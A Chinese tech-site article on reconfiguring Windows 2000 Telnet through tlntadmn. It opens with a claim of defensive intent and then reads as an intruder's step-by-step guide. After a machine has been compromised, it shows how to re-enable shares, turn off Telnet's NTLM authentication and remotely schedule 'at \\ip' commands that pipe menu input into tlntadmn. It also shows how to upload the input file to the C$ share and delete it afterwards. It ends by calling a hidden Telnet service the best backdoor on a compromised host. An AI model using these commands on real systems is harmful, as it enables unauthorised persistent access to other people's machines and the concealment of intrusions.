Telnet服务的Tlntadmn修改问题

网络 网络管理
文章摘要:下面我们对Telnet服务修改Tlntadmn的相关设置进行一下描述。那么其中包括两种方法,希望能够给大家提供帮助。

对于Telnet的使用中,它的入侵问题一直都令我们担忧。那么如何进行保护和防范呢?这里我们需要了解攻击的原理。下面我们就介绍一下Telnet服务被入侵的过程吧。这样也可以让我们对防止这类事情有所帮助。在入侵中,得到管理员帐号之后,很多事情显得轻而易举,可有时候幸运之神并不是总落在你身上的,这不,刚刚溢出成功内网的机器,本想用IPC$连接上去,竟发现"网络路径不存在",看来有必要先运行一次:net share /y 启动共享服务,显示成功后,终于连接搞定了!不过在接下来的开Telnet服务中便遇到了NTLM认证的问题,搬出自己习惯使用的工具:不依赖于IPC共享的VBS脚本,连忙传上去.运行之后却显示不成功,纳闷了.只能驱猫上线,继续我那无期的学习之路了,半晌终于找到一篇关开打开Telnet的教学,在再三测试后终于成功打开了那部机器的Telnet,经验不敢独享,写出来与大家共赏.

我们知道WIN2000中自带Tlntadmn命令,它可以更改Telnet的端口、运行参数、最大登录人数等等,可惜讨厌的NTLM认证会让我们远程无法登陆,现在我们需要的是摆脱NTLM认证的问题:

方法1:手动修改Tlntadmn:

我们按下面的命令直接在本地CMD下操作:

  1. C:\WINNT\system32>tlntadmn.exe  
  2. Microsoft (R) Windows 2000 (TM) (内部版本号 2195)  
  3. Telnet Server Admin (Build 5.00.99201.1) 

请在下列选项中选择一个:

0) 退出这个应用程序

1) 列出当前用户

2) 结束一个用户的会话 ...

3) 显示 / 更改注册表设置 ...

4) 开始服务

5) 停止服务

请键入一个选项的号码 [0 - 5] 以选择该选项:

选3回车进入设置,进入如下子界面:

请在下列选项中选择一个:

0) 退出这个菜单

1) AllowTrustedDomain

2) AltKeyMapping

3) DefaultDomain

4) DefaultShell

5) LoginScript

6) MaxFailedLogins

7) NTLM

8) TelnetPort

请键入一个选项的号码 [0 - 8] 以选择该选项:

我们选7,回车进入设置:NTLM的当前值=2,我们给它设置成1就可以了.设置完成后重启Telnet服务:net stop Telnet、net start Telnet,再在本地连接23端口,输入管理员帐号密码就OK了!手动修改NTLM的方法就这么简单,在平时入侵的时候,如果有3389等远程连接方式,推荐大家使用这样的方法去修改.#p#

方法2:利用脚本修改Tlntadmn:

有时我们出于特殊原因不要求立即停止Telnet服务或是变更NTLM模式,这时我们必须借助AT命令:at \\IP time 程序名,但实际上操作的话我们会发现:类似tlntadmn这样的程序是控制台的一个交互式工具,其参数设置并不能很好的被AT命令所调用,我们应如何处理呢?换句话说在没有3389等远程登陆的模式下,如何给方便的给对方开启Telnet服务呢?我们可以将命令写入一个txt文件,再加以调用.写入的命令请按照下面的顺序:

停止服务(5)->更改设置(3)->NTLM(7)->确认更改(y)->修改NTLM当前值(0)->再次确认(y)->退出菜单(0)->启动服务(4)->退出程序(0)

在方法1中我们知道在每个选择后面都要回车确认运行,所以我们要模拟操作写入的数据应是:

5(回车)3(回车)7(回车)y(回车)0(回车)y(回车)0(回车)4(回车)0(回车)

现在我们有二种思路接下去做:一是直接在被入侵机器的CMD上制作txt文件以供调用;二是在本地生成txt再上传到被入侵机器以供调用.

下面我们看他们分别是如何实现的:

1.直接在被入侵机器的CMD上制作txt文件以供调用.依次在cmd下如此运行命令:

  1. at \\ip time "echo 5 > c:\Telnet.txt"  
  2. at \\ip time "echo 3 >> c:\Telnet.txt"  
  3. at \\ip time "echo 7 >> c:\Telnet.txt"  
  4. at \\ip time "echo y >> c:\Telnet.txt"  
  5. at \\ip time "echo 0 >> c:\Telnet.txt"  
  6. at \\ip time "echo y >> c:\Telnet.txt"  
  7. at \\ip time "echo 0 >> c:\Telnet.txt"  
  8. at \\ip time "echo 4 >> c:\Telnet.txt"  
  9. at \\ip time "echo 0 >> c:\Telnet.txt"  
  10. at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt"  
  11. at \\ip time "del c:\Telnet.txt /f" 

只须按上面的命令行一行行打入运行就可以了.效果与方法1是等同的.

2.在本地生成txt再上传到被入侵机器以供调用.在本地机器上做一个Telnet.txt文件,内容如下:

5 3 7 y 0 y 0 4 0

注意每一行都要加回车,然后将这个文件上传到被入侵机器的C:盘下:

copy Telnet.txt \\ip\c$

再设置在某时间内启动并删除巳上传文件: at \\ip time "c:\winnt\system32\tlntadmn.exe < c:\Telnet.txt" at \\ip time "del c:\Telnet.txt /f"

很简单的dos管道重定向原理,这样就完成tlntadmn的交互过程.效果与方法A是等同的,简单那吧?

Tlntadmn在处理Telnet上显得异常强大,在入侵过程中如果能熟练应用它,那么开放Telnet服务将显得轻而易举,当然,隐蔽的Telnet服务也就是肉鸡上最好的后门了!你学会了吗?
 

责任编辑:佟健 来源: 网界网
相关推荐

2010-07-20 15:28:34

2010-07-26 14:48:56

修改Telnet服务

2010-07-22 11:11:52

修改Telnet服务

2010-07-19 18:03:07

Telnet服务器

2010-07-16 14:16:23

Telnet服务

2010-07-15 15:21:25

AIX telnet

2010-07-20 14:55:16

Telnet端口

2010-07-20 13:41:30

Telnet服务器

2010-07-26 13:12:42

2010-07-16 13:30:26

2010-07-19 14:00:30

Telnet服务

2010-07-15 10:00:40

2009-12-01 13:35:39

Telnet服务

2010-07-19 10:45:41

Telnet服务

2010-07-20 15:01:31

Telnet服务

2010-07-25 14:18:51

telnet服务

2010-07-27 15:02:40

Telnet 110端

2010-07-26 10:11:10

Microsoft T

2010-07-27 14:55:29

Telnet 23

2010-07-22 11:23:02

AIX TELNET
点赞
收藏

51CTO技术栈公众号